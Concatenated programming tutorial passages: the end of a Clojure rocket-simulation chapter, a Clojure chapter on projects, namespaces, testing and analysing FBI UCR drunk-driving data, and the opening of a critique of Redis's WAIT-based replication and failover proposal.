(stage craft)] (assoc craft ; Time advances by dt seconds :time (+ dt (:time craft)) ; We burn some fuel :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft))) ; Our position changes based on our velocity :position (merge-with + (:position craft) (scale dt (:velocity craft))) ; And our velocity changes based on our acceleration :velocity (merge-with + (:velocity craft) (scale dt (acceleration craft)))))) ;; Launch and flight (defn prepare "Prepares a craft for launch from an equatorial space center." [craft] (merge craft initial-space-center)) (defn trajectory [dt craft] "Returns all future states of the craft, at dt-second intervals." (iterate #(step % 1) craft)) ;; Analyzing trajectories (defn altitude "The height above the surface of the equator, in meters." [craft] (-> craft :position cartesian->spherical :r (- earth-equatorial-radius))) (defn above-ground? "Is the craft at or above the surface?" [craft] (<= 0 (altitude craft))) (defn flight "The above-ground portion of a trajectory." [trajectory] (take-while above-ground? trajectory)) (defn crashed? "Does this trajectory crash into the surface before 10 hours are up?" [trajectory] (let [time-limit (* 10 3600)] ; 10 hours (not (every? above-ground? (take-while #(<= (:time %) time-limit) trajectory))))) (defn crash-time "Given a trajectory, returns the time the rocket impacted the ground." [trajectory] (:time (last (flight trajectory)))) (defn apoapsis "The highest altitude achieved during a trajectory." [trajectory] (apply max (map altitude (flight trajectory)))) (defn apoapsis-time "The time of apoapsis" [trajectory] (:time (apply max-key altitude (flight trajectory))))

As written here, our first non-trivial program tells a story–though a different one than the process of exploration and refinement that brought the rocket to orbit. It builds from small, abstract ideas: linear algebra and coordinates; physical constants describing the universe for the simulation; and the basic outline of the spacecraft. Then we define the software controlling the rocket; the times for the burns, how much to thrust, in what direction, and when to separate stages. Using those control functions, we build a physics engine including gravity and thrust forces, and use Newton’s second law to build a basic Euler Method solver. Finally, we analyze the trajectories the solver produces to answer key questions: how high, how long, and did it explode?

We used Clojure’s immutable data structures–mostly maps–to represent the state of the universe, and defined pure functions to interpret those states and construct new ones. Using iterate, we projected a single state forward into an infinite timeline of the future–evaluated as demanded by the analysis functions. Though we pay a performance penalty, immutable data structures, pure functions, and lazy evaluation make simulating complex systems easier to reason about.

Had we written this simulation in a different language, different techniques might have come into play. In Java, C++, or Ruby, we would have defined a hierarchy of datatypes called classes, each one representing a small piece of state. We might define a Craft type, and created subtypes Atlas and Centaur. We’d create a Coordinate type, subdivided into Cartesian and Spherical, and so on. The types add complexity and rigidity, but also prevent mis-spellings, and can prevent us from interpreting, say, coordinates as craft or vice-versa.

To move the system forward in a language emphasizing mutable data structures, we would have updated the time and coordinates of a single craft in-place. This introduces additional complexity, because many of the changes we made depended on the current values of the craft. To ensure the correct ordering of calculations, we’d scatter temporary variables and explicit copies throughout the code, ensuring that functions didn’t see inconsistent pictures of the craft state. The mutable approach would likely be faster, but would still demand some copying of data, and sacrifice clarity.

More imperative languages place less emphasis on laziness, and make it harder to express ideas like map and take. We might have simulated the trajectory for some fixed time, constructing a history of all the intermediate results we needed, then analyzed it by moving explicitly from slot to slot in that history, checking if the craft had crashed, and so on.

Across all these languages, though, some ideas remain the same. We solve big problems by breaking them up into smaller ones. We use data structures to represent the state of the system, and functions to alter that state. Comments and docstrings clarify the story of the code, making it readable to others. Tests ensure the software is correct, and allow us to work piecewise towards a solution.

Exercises

  1. We know the spacecraft reached orbit, but we have no idea what that orbit looks like. Since the trajectory is infinite in length, we can’t ask about the entire history using max–but we know that all orbits have a high and low point. At the highest point, the difference between successive altitudes changes from increasing to decreasing, and at the lowest point, the difference between successive altitudes changes from decreasing to increasing. Using this technique, refine the apoapsis function to find the highest point using that inflection in altitudes–and write a corresponding periapsis function that finds the lowest point in the orbit. Display both periapsis and apoapsis in the test suite.

  2. We assumed the force of gravity resulted in a constant 9.8 meter/second/second acceleration towards the earth, but in the real world, gravity falls off with the inverse square law. Using the mass of the earth, mass of the spacecraft, and Newton’s constant, refine the gravitational force used in this simulation to take Newton’s law into account. How does this affect the apoapsis?

  3. We ignored the atmosphere, which exerts drag on the craft as it moves through the air. Write a basic air-density function which falls off with altitude. Make some educated guesses as to how much drag a real rocket experiences, and assume that the drag force is proportional to the square of the rocket’s velocity. Can your rocket still reach orbit?

  4. Notice that the periapsis and apoapsis of the rocket are different. By executing the circularization burn carefully, can you make them the same–achieving a perfectly circular orbit? One way to do this is to pick an orbital altitude and velocity of a known satellite–say, the International Space Station–and write the control software to match that velocity at that altitude.

Previously, we covered state and mutability.

Up until now, we’ve been programming primarily at the REPL. However, the REPL is a limited tool. While it lets us explore a problem interactively, that interactivity comes at a cost: changing an expression requires retyping the entire thing, editing multi-line expressions is awkward, and our work vanishes when we restart the REPL–so we can’t share our programs with others, or run them again later. Moreover, programs in the REPL are hard to organize. To solve large problems, we need a way of writing programs durably–so they can be read and evaluated later.

In addition to the code itself, we often want to store ancillary information. Tests verify the correctness of the program. Resources like precomputed databases, lookup tables, images, and text files provide other data the program needs to run. There may be documentation: instructions for how to use and understand the software. A program may also depend on code from other programs, which we call libraries, packages, or dependencies. In Clojure, we have a standardized way to bind together all these parts into a single directory, called a project.

Project structure

We created a project at the start of this book by using Leiningen, the Clojure project tool.

$ lein new scratch

scratch is the name of the project, and also the name of the directory where the project’s files live. Inside the project are a few files.

$ cd scratch; ls doc project.clj README.md resources src target test

project.clj defines the project: its name, its version, dependencies, and so on. Notice the name of the project (scratch) comes first, followed by the version (0.1.0-SNAPSHOT). -SNAPSHOT versions are for development; you can change them at any time, and any projects which depend on the snapshot will pick up the most recent changes. A version which does not end in -SNAPSHOT is fixed: once published, it always points to the same version of the project. This allows projects to specify precisely which projects they depend on. For example, scratch’s project.clj says scratch depends on org.clojure/clojure version 1.5.1.

(defproject scratch "0.1.0-SNAPSHOT" :description "FIXME: write description" :url "http://example.com/FIXME" :license {:name "Eclipse Public License" :url "http://www.eclipse.org/legal/epl-v10.html"} :dependencies [[org.clojure/clojure "1.5.1"] ])

README.md is the first file most people open when they look at a new project, and Lein generates a generic readme for you to fill in later. We call this kind of scaffolding or example a “stub”; it’s just there to remind you what sort of things to write yourself. You’ll notice the readme includes the name of the project, some notes on what it does and how to use it, a copyright notice where your name should go, and a license, which sets the legal terms for the use of the project. By default, Leiningen suggests the Eclipse Public License, which allows everyone to use and modify the software, so long as they preserve the license information.

The doc directory is for documentation; sometimes hand-written, sometimes automatically generated from the source code. resources is for additional files, like images. src is where Clojure code lives, and test contains the corresponding tests. Finally, target is where Leiningen stores compiled code, built packages, and so on.

Namespaces

Every lein project starts out with a stub namespace containing a simple function. Let’s take a look at that namespace now–it lives in src/scratch/core.clj:

(ns scratch.core) (defn foo "I don't do a whole lot." [x] (println x "Hello, World!"))

The first part of this file defines the namespace we’ll be working in. The ns macro lets the Clojure compiler know that all following code belongs in the scratch.core namespace. Remember, scratch is the name of our project. scratch.core is for the core functions and definitions of the scratch project. As projects expand, we might add new namespaces to separate our work into smaller, more understandable pieces. For instance, Clojure’s primary functions live in clojure.core, but there are auxiliary functions for string processing in clojure.string, functions for interoperating with Java’s input-output system in clojure.java.io, for printing values in clojure.pprint, and so on.

def, defn, and peers always work in the scope of a particular namespace. The function foo in scratch.core is different from the function foo in scratch.pad.

scratch.foo=> (ns scratch.core) nil scratch.core=> (def foo "I'm in core") #'scratch.core/foo scratch.core=> (ns scratch.pad) nil scratch.pad=> (def foo "I'm in pad!") #'scratch.pad/foo

Notice the full names of these vars are different: scratch.core/foo vs scratch.pad/foo. You can always refer to a var by its fully qualified name: the namespace, followed by a slash /, followed by the short name.

Inside a namespace, symbols resolve to variables which are defined in that namespace. So in scratch.pad, foo refers to scratch.pad/foo.

scratch.pad=> foo "I'm in pad!"

Namespaces automatically include clojure.core by default; which is where all the standard functions, macros, and special forms come from. let, defn, filter, vector, etc: all live in clojure.core, but are automatically included in new namespaces so we can refer to them by their short names.

Notice that the values for foo we defined in scratch.pad and scratch.core aren’t available in other namespaces, like user.

scratch.pad=> (ns user) nil user=> foo CompilerException java.lang.RuntimeException: Unable to resolve symbol: foo in this context, compiling:(NO_SOURCE_PATH:1:602)

To access things from other namespaces, we have to require them in the namespace definition.

user=> (ns user (:require [scratch.core])) nil user=> scratch.core/foo "I'm in core"

The :require part of the ns declaration told the compiler that the user namespace needed access to scratch.core. We could then refer to the fully qualified name scratch.core/foo.

Often, writing out the full namespace is cumbersome–so you can give a short alias for a namespace like so:

user=> (ns user (:require [scratch.core :as c])) nil user=> c/foo "I'm in core"

The :as directive indicates that anywhere we write c/something, the compiler should expand that to scratch.core/something. If you plan on using a var from another namespace often, you can refer it to the local namespace–which means you may omit the namespace qualifier entirely.

user=> (ns user (:require [scratch.core :refer [foo]])) nil user=> foo "I'm in core"

You can refer functions into the current namespace by listing them: [foo bar ...]. Alternatively, you can suck in every function from another namespace by saying :refer :all:

user=> (ns user (:require [scratch.core :refer :all])) nil user=> foo "I'm in core"

Namespaces control complexity by isolating code into more understandable, related pieces. They make it easier to read code by keeping similar things together, and unrelated things apart. By making dependencies between namespaces explicit, they make it clear how groups of functions relate to one another.

If you’ve worked with Erlang, Modula-2, Haskell, Perl, or ML, you’ll find namespaces analogous to modules or packages. Namespaces are often large, encompassing hundreds of functions; and most projects use only a handful of namespaces.

By contrast, object-oriented programming languages like Java, Scala, Ruby, and Objective C organize code in classes, which combine names and state in a single construct. Because all functions in a class operate on the same state, object-oriented languages tend to have many classes with fewer functions in each. It’s not uncommon for a typical Java project to define hundreds or thousands of classes containing only one or two functions each. If you come from an object-oriented language, it can feel a bit unusual to combine so many functions in a single scope–but because functional programs isolate state differently, this is normal. If, on the other hand, you move to an object-oriented language after Clojure, remember that OO languages compose differently. Objects with hundreds of functions are usually considered unwieldy and should be split into smaller pieces.

Code and tests

It’s perfectly fine to test small programs in the REPL. We’ve written and refined hundreds of functions that way: by calling the function and seeing what happens. However, as programs grow in scope and complexity, testing them by hand becomes harder and harder. If you change the behavior of a function which ten other functions rely on, you may have to re-test all ten by hand. In real programs, a small change can alter thousands of distinct behaviors, all of which should be verified.

Wherever possible, we want to automate software tests–making the test itself another program. If the test suite runs in a matter of seconds, we can make changes freely–re-running the tests continuously to verify that everything still works.

As a simple example, let’s write and test a single function in src/scratch/core.clj. How about exponentiation–raising a number to the given power?

(ns scratch.core) (defn pow "Raises base to the given power. For instance, (pow 3 2) returns three squared, or nine." [base power] (apply * (repeat base power)))

So we repeat the base power times, then call * with that sequence of bases to multiply them all together. Seems straightforward enough. Now we need to test it.

By default, all lein projects come with a simple test stub. Let’s see it in action by running lein test.

aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test lein test :only scratch.core-test/a-test FAIL in (a-test) (core_test.clj:7) FIXME, I fail. expected: (= 0 1) actual: (not (= 0 1)) Ran 1 tests containing 1 assertions. 1 failures, 0 errors. Tests failed.

A failure is when a test returns the wrong value. An error is when a test throws an exception. In this case, the test named a-test, in the file core_test.clj, on line 7, failed. That test expected zero to be equal to one–but found that 0 and 1 were (in point of fact) not equal. Let’s take a look at that test, in test/scratch/core_test.clj.

(ns scratch.core-test (:require [clojure.test :refer :all] [scratch.core :refer :all])) (deftest a-test (testing "FIXME, I fail." (is (= 0 1))))

These tests live in a namespace too! Notice that namespaces and file names match up: scratch.core lives in src/scratch/core.clj, and scratch.core-test lives in test/scratch/core_test.clj. Dashes (-) in namespaces correspond to underscores (_) in filenames, and dots (.) correspond to directory separators (/).

The scratch.core-test namespace is responsible for testing things in scratch.core. Notice that it requires two namespaces: clojure.test, which provides testing functions and macros, and scratch.core, which is the namespace we want to test.

Then we define a test using deftest. deftest takes a symbol as a test name, and then any number of expressions to evaluate. We can use testing to split up tests into smaller pieces. If a test fails, lein test will print out the enclosing deftest and testing names, to make it easier to figure out what went wrong.

Let’s change this test so that it passes. 0 should equal 0.

(deftest a-test (testing "Numbers are equal to themselves, right?" (is (= 0 0)))) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test Ran 1 tests containing 1 assertions. 0 failures, 0 errors.

Wonderful! Now let’s test the pow function. I like to start with a really basic case and work my way up to more complicated ones. 11 is 1, so:

(deftest pow-test (testing "unity" (is (= 1 (pow 1 1))))) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test Ran 1 tests containing 1 assertions. 0 failures, 0 errors.

Excellent. How about something harder?

(deftest pow-test (testing "unity" (is (= 1 (pow 1 1)))) (testing "square integers" (is (= 9 (pow 3 2))))) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test lein test :only scratch.core-test/pow-test FAIL in (pow-test) (core_test.clj:10) square integers expected: (= 9 (pow 3 2)) actual: (not (= 9 8)) Ran 1 tests containing 2 assertions. 1 failures, 0 errors. Tests failed.

That’s odd. 32 should be 9, not 8. Let’s double-check our code in the REPL. base was 3, and power was 2, so…

user=> (repeat 3 2) (2 2 2) user=> (* 2 2 2) 8

Ah, there’s the problem. We’re mis-using repeat. Instead of repeating 3 twice, we repeated 2 thrice.

user=> (doc repeat) ------------------------- clojure.core/repeat ([x] [n x]) Returns a lazy (infinite!, or length n if supplied) sequence of xs.

Let’s redefine pow with the correct arguments to repeat:

(defn pow "Raises base to the given power. For instance, (pow 3 2) returns three squared, or nine." [base power] (apply * (repeat power base)))

How about 00? By convention, mathematicians define 00 as 1.

(deftest pow-test (testing "unity" (is (= 1 (pow 1 1)))) (testing "square integers" (is (= 9 (pow 3 2)))) (testing "0^0" (is (= 1 (pow 0 0))))) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test Ran 1 tests containing 3 assertions. 0 failures, 0 errors.

Hey, what do you know? It works! But why?

user=> (repeat 0 0) ()

What happens when we call * with an empty list of arguments?

user=> (*) 1

Remember when we talked about how the zero-argument forms of +, and * made some definitions simpler? This is one of those times. We didn’t have to define a special exception for zero powers because (*) returns the multiplicative identity 1, by convention.

Exploring data

The last bit of logistics we need to talk about is working with other people’s code. Clojure projects, like most modern programming environments, are built to work together. We can use libraries to parse data, solve mathematical problems, render graphics, perform simulations, talk to robots, or predict the weather. As a quick example, I’d like to imagine that you and I are public-health researchers trying to identify the best location for an ad campaign to reduce drunk driving.

The FBI’s Uniform Crime Reporting database tracks the annual tally of different types of arrests, broken down by county–but the data files provided by the FBI are a mess to work with. Helpfully, Matt Aliabadi has helpfully organized the UCR’s somewhat complex format into nice, normalized files in a data format called JSON, and made them available on Github. Let’s download the most recent year’s normalized data, and save it in the scratch directory.

What’s in this file, anyway? Let’s take a look at the first few lines using head:

aphyr@waterhouse:~/scratch$ head 2008.json [ { "icpsr_study_number": null, "icpsr_edition_number": 1, "icpsr_part_number": 1, "icpsr_sequential_case_id_number": 1, "fips_state_code": "01", "fips_county_code": "001", "county_population": 52417, "number_of_agencies_in_county": 3,

This is a data format called JSON, and it looks a lot like Clojure’s data structures. That’s the start of a vector on the first line, and the second line starts a map. Then we’ve got string keys like "icpsr_study_number", and values which look like null (nil), numbers, or strings. But in order to work with this file, we’ll need to parse it into Clojure data structures. For that, we can use a JSON parsing library, like Cheshire.

Cheshire, like most Clojure libraries, is published on an internet repository called Clojars. To include it in our scratch project, all we have to do is add open project.clj in a text editor, and add a line specifying that we want to use a particular version of Cheshire.

(defproject scratch "0.1.0-SNAPSHOT" :description "Just playing around" :url "http://example.com/FIXME" :license {:name "Eclipse Public License" :url "http://www.eclipse.org/legal/epl-v10.html"} :dependencies [[org.clojure/clojure "1.5.1"] [cheshire "5.3.1"]])

Now we’ll exit the REPL with Control+D (^D), and restart it with lein repl. Leiningen, the Clojure package manager, will automatically download Cheshire from Clojars and make it available in the new REPL session.

Now let’s figure out how to parse the JSON file. Looking at Cheshire’s README shows an example that looks helpful:

;; parse some json and get keywords back (parse-string "{\"foo\":\"bar\"}" true) ;; => {:foo "bar"}

So Cheshire includes a parse-string function which can take a string and return a data structure. How can we get a string out of a file? Using slurp:

user=> (use 'cheshire.core) nil user=> (parse-string (slurp "2008.json")) ...

Woooow, that’s a lot of data! Let’s chop it down to something more manageable. How about the first entry?

user=> (first (parse-string (slurp "2008.json"))) {"syntheticdrug_salemanufacture" 1, "all_other_offenses_except_traffic" 900, "arson" 3, ...} user=> (-> "2008.json" slurp parse-string first)

It’d be nicer if this data used keywords instead of strings for its keys. Let’s use the second argument to Chesire’s parse-string to convert all the keys in maps to keywords.

user=> (first (parse-string (slurp "2008.json") true)) {:other_assaults 288, :gambling_all_other 0, :arson 3, ... :drunkenness 108}

Since we’re going to be working with this dataset over and over again, let’s bind it to a variable for easy re-use.

user=> (def data (parse-string (slurp "2008.json") true)) #'user/data

Now we’ve got a big long vector of counties, each represented by a map–but we’re just interested in the DUIs of each one. What does that look like? Let’s map each county to its :driving_under_influence.

user=> (->> data (map :driving_under_influence)) (198 1095 114 98 135 4 122 587 204 53 177 ...

What’s the most any county has ever reported?

user=> (->> data (map :driving_under_influence) (apply max)) 45056

45056 counts in one year? Wow! What about the second-worst county? The easiest way to find the top n counties is to sort the list, then look at the final elements.

user=> (->> data (map :driving_under_influence) sort (take-last 10)) (8589 10432 10443 10814 11439 13983 17572 18562 26235 45056)

So the top 10 counties range from 8549 counts to 45056 counts. What’s the most common count? Clojure comes with a built-in function called frequencies which takes a sequence of elements, and returns a map from each element to how many times it appeared in the sequence.

user=> (->> data (map :driving_under_influence) frequencies) {0 227, 1024 1, 45056 1, 32 15, 2080 1, 64 12 ...

Now let’s take those [drunk-driving, frequency] pairs and sort them by key to produce a histogram. sort-by takes a function to apply to each element in the collection–in this case, a key-value pair–and returns something that can be sorted, like a number. We’ll choose the key function to extract the key from each key-value pair, effectively sorting the counties by number of reported incidents.

user=> (->> data (map :driving_under_influence) frequencies (sort-by key) pprint) ([0 227] [1 24] [2 17] [3 20] [4 17] [5 24] [6 23] [7 23] [8 17] [9 19] [10 29] [11 20] [12 18] [13 21] [14 25] [15 13] [16 18] [17 16] [18 17] [19 11] [20 8] ...

So a ton of counties (227 out of 3172 total) report no drunk driving; a few hundred have one incident, a moderate number have 10-20, and it falls off from there. This is a common sort of shape in statistics; often a hallmark of an exponential distribution.

How about the 10 worst counties, all the way out on the end of the curve?

user=> (->> data (map :driving_under_influence) frequencies (sort-by key) (take-last 10) pprint) ([8589 1] [10432 1] [10443 1] [10814 1] [11439 1] [13983 1] [17572 1] [18562 1] [26235 1] [45056 1])

So it looks like 45056 is high, but there are 8 other counties with tens of thousands of reports too. Let’s back up to the original dataset, and sort it by DUIs:

user=> (->> data (sort-by :driving_under_influence) (take-last 10) pprint) ({:other_assaults 3096, :gambling_all_other 3, :arson 106, :have_stolen_property 698, :syntheticdrug_salemanufacture 0, :icpsr_sequential_case_id_number 220, :drug_abuse_salemanufacture 1761, ...

What we’re looking for is the county names, but it’s a little hard to read these enormous maps. Let’s take a look at just the keys that define each county, and see which ones might be useful. We’ll take this list of counties, map each one to a list of its keys, and concatenate those lists together into one big long list. mapcat maps and concatenates in a single step. We expect the same keys to show up over and over again, so we’ll remove duplicates by merging all those keys into a sorted-set.

user=> (->> data (sort-by :driving_under_influence) (take-last 10) (mapcat keys) (into (sorted-set)) pprint) #{:aggravated_assaults :all_other_offenses_except_traffic :arson :auto_thefts :bookmaking_horsesport :burglary :county_population :coverage_indicator :curfew_loitering_laws :disorderly_conduct :driving_under_influence :drug_abuse_salemanufacture :drug_abuse_violationstotal :drug_possession_other :drug_possession_subtotal :drunkenness :embezzlement :fips_county_code :fips_state_code :forgerycounterfeiting :fraud :gambling_all_other :gambling_total :grand_total :have_stolen_property :icpsr_edition_number :icpsr_part_number :icpsr_sequential_case_id_number :icpsr_study_number :larceny :liquor_law_violations :marijuana_possession :marijuanasalemanufacture :multicounty_jurisdiction_flag :murder :number_of_agencies_in_county :numbers_lottery :offenses_against_family_child :opiumcocaine_possession :opiumcocainesalemanufacture :other_assaults :otherdang_nonnarcotics :part_1_total :property_crimes :prostitutioncomm_vice :rape :robbery :runaways :sex_offenses :suspicion :synthetic_narcoticspossession :syntheticdrug_salemanufacture :vagrancy :vandalism :violent_crimes :weapons_violations}

Ah, :fips_county_code and :fips_state_code look promising. Let’s compact the dataset to just drunk driving and those codes, using select-keys.

user=> (->> data (sort-by :driving_under_influence) (take-last 10) (map #(select-keys % [:driving_under_influence :fips_county_code :fips_state_code])) pprint) ({:fips_state_code "06", :fips_county_code "067", :driving_under_influence 8589} {:fips_state_code "48", :fips_county_code "201", :driving_under_influence 10432} {:fips_state_code "32", :fips_county_code "003", :driving_under_influence 10443} {:fips_state_code "06", :fips_county_code "065", :driving_under_influence 10814} {:fips_state_code "53", :fips_county_code "033", :driving_under_influence 11439} {:fips_state_code "06", :fips_county_code "071", :driving_under_influence 13983} {:fips_state_code "06", :fips_county_code "059", :driving_under_influence 17572} {:fips_state_code "06", :fips_county_code "073", :driving_under_influence 18562} {:fips_state_code "04", :fips_county_code "013", :driving_under_influence 26235} {:fips_state_code "06", :fips_county_code "037", :driving_under_influence 45056})

Now we’re getting somewhere–but we need a way to interpret these state and county codes. Googling for “FIPS” led me to Wikipedia’s account of the FIPS county code system, and the NOAA’s ERDDAP service, which has a table mapping FIPS codes to state and county names. Let’s save that file as fips.json.

Now we’ll slurp that file into the REPL and parse it, just like we did with the crime dataset.

user=> (def fips (parse-string (slurp "fips.json") true))

Let’s take a quick look at the structure of this data:

user=> (keys fips) (:table) user=> (keys (:table fips)) (:columnNames :columnTypes :rows) user=> (->> fips :table :columnNames) ["FIPS" "Name"]

Great, so we expect the rows to be a list of FIPS code and Name.

user=> (->> fips :table :rows (take 3) pprint) (["02000" "AK"] ["02013" "AK, Aleutians East"] ["02016" "AK, Aleutians West"])

Perfect. Now that’s we’ve done some exploratory work in the REPL, let’s shift back to an editor. Create a new file in src/scratch/crime.clj:

(ns scratch.crime (:require [cheshire.core :as json])) (def fips "A map of FIPS codes to their county names." (->> (json/parse-string (slurp "fips.json") true) :table :rows (into {})))

We’re just taking a snippet we wrote in the REPL–parsing the FIPS dataset–and writing it down for use as a part of a bigger program. We use (into {}) to convert the sequence of [fips, name] pairs into a map, just like we used into (sorted-set) to merge a list of keywords into a set earlier. into works just like conj, repeated over and over again, and is an incredibly useful tool for building up collections of things.

Back in the REPL, let’s check if that worked:

user=> (use 'scratch.crime :reload) nil user=> (fips "10001") "DE, Kent"

Remember, maps act like functions in Clojure, so we can use the fips map to look up the names of counties efficiently.

We also have to load the UCR crime file–so let’s split that load-and-parse code into its own function:

(defn load-json "Given a filename, reads a JSON file and returns it, parsed, with keywords." [file] (json/parse-string (slurp file) true)) (def fips "A map of FIPS codes to their county names." (->> "fips.json" load-json :table :rows (into {})))

Now we can re-use load-json to load the UCR crime file.

(defn most-duis "Given a JSON filename of UCR crime data for a particular year, finds the counties with the most DUIs." [file] (->> file load-json (sort-by :driving_under_influence) (take-last 10) (map #(select-keys % [:driving_under_influence :fips_county_code :fips_state_code])))) user=> (use 'scratch.crime :reload) (pprint (most-duis "2008.json")) nil ({:fips_state_code "06", :fips_county_code "067", :driving_under_influence 8589} {:fips_state_code "48", :fips_county_code "201", :driving_under_influence 10432} {:fips_state_code "32", :fips_county_code "003", :driving_under_influence 10443} {:fips_state_code "06", :fips_county_code "065", :driving_under_influence 10814} {:fips_state_code "53", :fips_county_code "033", :driving_under_influence 11439} {:fips_state_code "06", :fips_county_code "071", :driving_under_influence 13983} {:fips_state_code "06", :fips_county_code "059", :driving_under_influence 17572} {:fips_state_code "06", :fips_county_code "073", :driving_under_influence 18562} {:fips_state_code "04", :fips_county_code "013", :driving_under_influence 26235} {:fips_state_code "06", :fips_county_code "037", :driving_under_influence 45056})

Almost there. We need to join together the state and county FIPS codes into a single string, because that’s how fips represents the county code:

(defn fips-code "Given a county (a map with :fips_state_code and :fips_county_code keys), returns the five-digit FIPS code for the county, as a string." [county] (str (:fips_state_code county) (:fips_county_code county)))

Let’s write a quick test in test/scratch/crime_test.clj to verify that function works correctly:

(ns scratch.crime-test (:require [clojure.test :refer :all] [scratch.crime :refer :all])) (deftest fips-code-test (is (= "12345" (fips-code {:fips_state_code "12" :fips_county_code "345"})))) aphyr@waterhouse:~/scratch$ lein test scratch.crime-test lein test scratch.crime-test Ran 1 tests containing 1 assertions. 0 failures, 0 errors.

Great. Note that lein test some-namespace runs only the tests in that particular namespace. For the last step, let’s take the most-duis function and, using fips and fips-code, construct a map of county names to DUI reports.

(defn most-duis "Given a JSON filename of UCR crime data for a particular year, finds the counties with the most DUIs." [file] (->> file load-json (sort-by :driving_under_influence) (take-last 10) (map (fn [county] [(fips (fips-code county)) (:driving_under_influence county)])) (into {}))) user=> (use 'scratch.crime :reload) (pprint (most-duis "2008.json")) nil {"CA, Orange" 17572, "CA, San Bernardino" 13983, "CA, Los Angeles" 45056, "CA, Riverside" 10814, "NV, Clark" 10443, "WA, King" 11439, "AZ, Maricopa" 26235, "CA, San Diego" 18562, "TX, Harris" 10432, "CA, Sacramento" 8589}

Our question is, at least in part, answered: Los Angeles and Maricopa counties, in California and Arizona, have the most reports of drunk driving out of any counties in the 2008 Uniform Crime Reporting database. These might be good counties for a PSA campaign. California has either lots of drunk drivers, or aggressive enforcement, or both! Remember, this only tells us about reports of crimes; not the crimes themselves. Numbers vary based on how the state enforces the laws!

(ns scratch.crime (:require [cheshire.core :as json])) (defn load-json "Given a filename, reads a JSON file and returns it, parsed, with keywords." [file] (json/parse-string (slurp file) true)) (def fips "A map of FIPS codes to their county names." (->> "fips.json" load-json :table :rows (into {}))) (defn fips-code "Given a county (a map with :fips_state_code and :fips_county_code keys), returns the five-digit FIPS code for the county, as a string." [county] (str (:fips_state_code county) (:fips_county_code county))) (defn most-duis "Given a JSON filename of UCR crime data for a particular year, finds the counties with the most DUIs." [file] (->> file load-json (sort-by :driving_under_influence) (take-last 10) (map (fn [county] [(fips (fips-code county)) (:driving_under_influence county)])) (into {})))

Recap

In this chapter, we expanded beyond transient programs written in the REPL. We learned how projects combine static resources, code, and tests into a single package, and how projects can relate to one another through dependencies. We learned the basics of Clojure’s namespace system, which isolates distinct chunks of code from one another, and how to include definitions from one namespace in another via require and use. We learned how to write and run tests to verify our code’s correctness, and how to move seamlessly between the repl and code in .clj files. We made use of Cheshire, a Clojure library published on Clojars, to parse JSON–a common data format. Finally, we brought together our knowledge of Clojure’s basic grammar, immutable data structures, core functions, sequences, threading macros, and vars to explore a real-world problem.

Exercises

  1. most-duis tells us about the raw number of reports, but doesn’t account for differences in county population. One would naturally expect counties with more people to have more crime! Divide the :driving_under_influence of each county by its :county_population to find a prevalence of DUIs, and take the top ten counties based on prevalence. How should you handle counties with a population of zero?

  2. How do the prevalence counties compare to the original counties? Expand most-duis to return vectors of [county-name, prevalence, report-count, population] What are the populations of the high-prevalence counties? Why do you suppose the data looks this way? If you were leading a public-health campaign to reduce drunk driving, would you target your intervention based on report count or prevalence? Why?

  3. We can generalize the most-duis function to handle any type of crime. Write a function most-prevalent which takes a file and a field name, like :arson, and finds the counties where that field is most often reported, per capita.

  4. Write a test to verify that most-prevalent is correct.

In a recent blog post, antirez detailed a new operation in Redis: WAIT. WAIT is proposed as an enhancement to Redis' replication protocol to reduce the window of data loss in replicated Redis systems; clients can block awaiting acknowledgement of a write to a given number of nodes (or time out if the given threshold is not met). The theory here is that positive acknowledgement of a write to a majority of nodes guarantees that write will be visible in all future states of the system.

As I explained earlier, any asynchronously replicated system with primary-secondary failover allows data loss. Optional synchronous replication, antirez proposes, should make it possible for Redis to provide strong consistency for those operations.

WAIT means that if you run three nodes A, B, C where every node contains a Sentinel instance and a Redis instance, and you “WAIT 1” after every operation to reach the majority of slaves, you get a consistent system.

WAIT can be also used, by improving the failover procedure, in order to have a strong consistent system (no writes to the older master from the point the failure detection is positive, to the end of the failover when the configuration is updated, or alternative, disconnect the majority of slaves you can reach during the failure detection so that every write will fail during this time).

Antirez later qualified these claims:

I understand this not the “C” consistency of “CAP” but, before: the partition with clients and the (old) master partitioned away would receive writes that gets lost. after: under certain system models the system is consistent, like if you assume that crashed instances never start again. Of course, the existence of synchronous replication does not prove that the system is linearizable; only some types of failover preserve the ordering of writes.

As I showed in Call me maybe: Redis, Redis Sentinel will enter split-brain during network partitions, causing significant windows of data loss. Exactly how much data loss depends on the sentinel configuration and the failure topology. Antirez finally suggested that if we replace Redis Sentinel with a strongly consistent coordination service for failover, Redis WAIT could provide full linearizability.

The failover proposal

In a five-node cluster, assume every write is followed by WAIT 2 to ensure that a majority of nodes have received the write. In the event of a failure, a strong external coordinator goes through the following election process:

  1. Totally partition the old primary P1.
  2. Of all reachable nodes, identify the node with the highest replication offset. Let that node be P2.
  3. Promote P2.
  4. Inform all reachable nodes that they are to follow P2.
  5. Have all reachable clients switch to the new primary.

There are several serious problems with this design. I hinted at these issues in the mailing list with limited success. Kelly Sommers pointed out repeatedly that this design has the same issues as Cassandra’s CL.ALL. Replication alone does not ensure linearizability; we have to be able to roll back operations which should not have happened in the first place. If those failed operations can make it into our consistent timeline in an unsafe way, perhaps corrupting our successful operations, we can lose data.

… surprisingly I think that transactional rollbacks are totally irrelevant.

Ultimately I was hoping that antirez and other contributors might realize why their proposal for a custom replication protocol was unsafe nine months ago, and abandon it in favor of an established algorithm with a formal model and a peer-reviewed proof, but that hasn’t happened yet. Redis continues to accrete homegrown consensus and replication algorithms without even a cursory nod to formal analysis.

OK, fine. Let’s talk about the failover coordinator.

The coordinator

Redis Sentinel is not linearizable; nor are its proposed improvements. Whatever failover system you’re planning to use here is going to need something stronger. In fact, we can’t even guarantee safety using a strong coordination service like ZooKeeper to serialize the failover operations, because ZooKeeper cannot guarantee the mutual exclusion of two services in the presence of message delays and clock skews. Let’s paper over that issue by introducing large delays and carefully ordering our timeouts.

